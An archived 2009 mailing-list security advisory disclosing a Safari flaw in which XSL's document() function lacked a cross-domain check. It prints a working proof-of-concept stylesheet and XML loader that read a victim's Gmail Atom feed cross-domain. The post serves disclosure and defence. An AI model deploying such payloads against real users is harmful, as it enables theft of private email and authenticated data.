Main Archive Page > Month Archives  > full-disclosure-uk archives

[Full-disclosure] Apple Safari cross-domain XML theft vulnerability

From: Chris Evans <scarybeasts_at_nospam>
Date: Tue Jun 09 2009 - 21:14:05 GMT
To: full-disclosure <full-disclosure@lists.grok.org.uk>, bugtraq <bugtraq@securityfocus.com>

Hi,

Safari prior to version 4 may permit an evil web page to steal arbitrary XML data cross-domain.

This is accomplished by abusing a relatively obscure cross-domain access point which was completely missing a cross-domain access check. The access point in question is the document() function in XSL. This is best illustrated with a sample evil XSL file which abuses this function:

<xsl:stylesheet version="1.0"

xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:str="http://exslt.org/strings" extension-element-prefixes="str">
<xsl:template match="*">
<html>
<body>

Below, you should see e-mail stolen cross-domain!
<p/>
<xsl:value-of select="document('https://mail.google.com/mail/feed/atom')"/>
<script>

alert(document.body.innerHTML)
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

To mount the attack, the attacker would serve a web page which has XML MIME type and requests to be styled by the evil stylesheet:

<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet type="text/xsl" href="safaristealmailbug.xsl"?>
<xml>

irrelevant
</xml>

There are a number of interesting XML-based formats you might want to steal including authenticated RSS, XML-formatted AJAX-y responses, and XHTML. Full technical details: http://scary.beasts.org/security/CESA-2009-008.html

Blog post: http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-also-fixes-cross-domain.html (includes 1-click demo)

Cheers
Chris

---

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/